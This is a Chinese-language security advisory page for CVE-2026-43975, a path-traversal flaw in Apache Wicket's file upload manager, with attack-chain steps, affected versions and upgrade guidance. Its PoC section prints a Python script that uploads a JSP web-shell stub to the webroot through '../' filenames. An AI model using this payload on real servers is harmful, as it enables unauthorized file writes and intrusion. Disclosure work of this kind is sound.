IPBUF安全漏洞报告
English
CVE-2026-43975 CVSS 6.5 中危

CVE-2026-43975 Apache Wicket 任意文件读写漏洞

披露日期: 2026-05-06
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-43975
漏洞类型
路径遍历
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Apache Wicket

相关标签

路径遍历任意文件写入Apache Wicket无需认证文件上传漏洞

漏洞概述

Apache Wicket的FolderUploadsFileManager组件存在安全缺陷,未对`uploadFieldId`参数及`clientFileName`进行充分校验。未经身份验证的攻击者可利用此漏洞绕过上传目录限制,在服务器任意位置写入恶意文件或读取敏感数据,造成严重安全风险。

技术细节

该漏洞源于Apache Wicket框架中的`FolderUploadsFileManager`组件在处理文件上传逻辑时存在缺陷。具体而言,开发者在构造服务器端文件路径时,直接信任并使用了用户可控的`uploadFieldId`参数和`clientFileName`参数,未对这些输入进行严格的路径合法性校验或特殊字符过滤。这允许攻击者通过注入路径遍历字符(如`../`)来打破预期的目录限制。鉴于CVSS向量显示无需认证(PR:N)且攻击复杂度低(AC:L),远程攻击者可轻松构建恶意数据包。利用该漏洞,攻击者不仅可以向系统任意目录写入文件(可能导致植入WebShell或恶意脚本),还能读取服务器上的任意敏感配置文件,严重威胁系统安全。

攻击链分析

STEP 1
侦察
识别目标服务器是否使用了受影响版本的Apache Wicket框架,并定位文件上传功能接口。
STEP 2
漏洞利用
构造包含路径遍历字符(如../)的恶意HTTP请求,修改clientFileName或uploadFieldId参数,指向预期的上传目录之外。
STEP 3
执行攻击
发送恶意请求,服务器未过滤参数,将文件写入任意位置(如Web目录)或读取服务器敏感文件。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: Apache Wicket FolderUploadsFileManager Path Traversal (CVE-2026-43975) # Description: Uploads a file outside the intended directory by manipulating parameters. target_url = "http://vulnerable-host/wicket-upload-endpoint" # The vulnerability allows controlling the file path via unsanitized parameters. # Attackers can use '../' to traverse directories. files = { # Malicious filename attempting to write to webroot or temp directory 'file': ('../../../var/www/html/shell.jsp', b'<%@ page import="java.io.*" %><%=request.getParameter("cmd")%>', 'application/octet-stream') } # Vulnerable parameter names might vary based on implementation, # but 'uploadFieldId' or similar are mentioned in the advisory. data = { 'uploadFieldId': 'component_id', # Other form fields required by the application } try: response = requests.post(target_url, files=files, data=data) if response.status_code == 200: print("[+] Potential exploit successful. Check if file was written.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}")

影响范围

Apache Wicket 8.0.0 - 8.17.0
Apache Wicket 9.0.0 - 9.22.0
Apache Wicket 10.0.0 - 10.8.0

防御指南

临时缓解措施
建议用户立即升级至 Apache Wicket 10.9.0 或更高版本以修复此漏洞。如果无法立即升级,应限制对上传接口的网络访问,并在应用网关处拦截包含路径遍历字符(如../)的请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表